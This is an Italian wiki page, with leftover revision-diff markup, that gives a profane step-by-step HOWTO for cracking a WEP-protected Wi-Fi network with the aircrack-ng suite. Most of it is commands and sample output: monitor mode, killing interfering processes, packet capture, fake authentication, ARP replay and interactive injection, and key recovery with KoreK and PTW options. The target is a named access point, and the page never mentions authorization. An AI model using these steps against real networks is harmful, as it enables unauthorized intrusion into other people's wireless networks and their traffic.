Size: 4506
Comment: ALALA'
|
Size: 4509
Comment:
|
Deletions are marked like this. | Additions are marked like this. |
Line 117: | Line 117: |
Line 119: | Line 120: |
21:27 | |
Line 122: | Line 124: |
WEP Cracking HOWTO
by asbesto && lechuck
Ho scritto questo HOWTO perche' stanco di perdere tempo a leggere cazzate in rete. TUTTI i documenti che in teoria dovrebbero spiegare come crackare una rete WEP, nella realta' non spiegano UN CAZZO DI NIENTE, rimandando a pagine di manuali, facendo esempi senza alcuna spiegazione, o rimandando a pagine di help per le spiegazioni. E STI CAZZI, se mi rimandi alle pagine di manuale, tutto e', fuorche' un HOWTO!
Grazie a lechuck senza il quale io non avrei concluso un cazzo di niente.
Seguendo passo passo questo documento, invece, SI OTTENGONO RISULTATI, SUBITO, PRESTO E BENE.
Cose da installare
Ovviamente serve la suite di aircrack, che ora si chiama aircrack-ng solamente perche' il vecchio aircrack non viene piu' sviluppato. Ora, potremmo parlare ore sul fatto che ste teste di cazzo potevano tranquillamente SBATTERSENE LE PALLE ed evitare di aggiungere sto PORCODIO di -ng ad ogni cazzo di comando: MA CHE GRAN ROTTURA DI PALLE!!!
sudo apt-get install aircrack-ng
Settiamo la scheda
Basta lanciare il comando apposito:
root@lem:~# airmon-ng start wlan0 1
cosi lui attiva mon0. Eventualmente, ti dice che ci sono dei processi che scassano il cazzo, come quelle cagate avahi, networkmanager, eccetera. Vanno KILLATE senza pieta'. Non serve rilanciare airmon-ng.
Dati di fatto
Assumiamo che l'ap sia Diolink-22334455 con mac address (bssid) AP:AP:AP:AP:AP:AP
MAC Address della mia scheda di rete sul portatile: IO:IO:IO:IO:IO:IO
PRIMO: Lanciamo il dump dei dati
airodump-ng -c 1 -b AP:AP:AP:AP:AP:AP -t wep -w output.cap mon0
SECONDO: aireplay #1
SPOSTIAMOCI SU UNA SECONDA SHELL:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0 16:55:37 Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1 16:55:37 Sending Authentication Request (Open System) 16:55:37 Authentication successful 16:55:37 Sending Association Request 16:55:37 Association successful :-) (AID: 1) root@lem:~#
FANTASTICO, vuol dire che autentica. ora lanciamo un
aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0 root@lem:~# aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0 16:57:27 Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1 Saving ARP requests in replay_arp-0629-165727.cap You should also start airodump-ng to capture replies. Read 1427 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Il numero di pacchetti aumenta sempre. 0 arp e' male. quindi passiamo alla terza fase
TERZO: altro aireplay
DA UNA TERZA SHELL RIPROVIAMO nel frattempo ad autenticarci, lasciando girare le altre 2:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
se crea degli ARP, bene!. se crea solo degli ACK, non servono... quindi fanculo, restiamo sulla terza shell e diamo
aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
Questo e' il modo iterattivo di aireplay; genera pacchetti appositi con cui fare merda. In teoria dovresti dirgli Y al pacchetto che crea solo se e' lungo 68 o 86. lui legge pacchetti, ci riflette e crea.
68 = grandezza in byte di un arp di client wifi, 86 invece wired.
ne da uno a 76, ci provo: do y.
dopo un po provo un
aircrack-ng nomedelfile.dump
ed ecco SETTANTASEIMILA IV !!!!! E PARTE A CRACKARE!!!
lui sotto al culo si vede crescere il file, quando da failed, ricomincia perche se ne trova sempre di piu'...
E' FATTA, PRIMA O POI INCULA.
appunti
aircrack-ng -K file.dump o file.ivs
-k e' un algoritmo per crackare
dal man di aircrack:
-k <korek> There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
-y This is an experimental single brute-force attack which should only be used when the standard attack mode fails with more than one million IVs.
-z Uses PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann) attack.
in alcuni casi (tipo al**ce adsl conviene usare -z che se non si cracca con >1 milione di IV e' perche' gli algoritmi di default falliscono
- [lobo]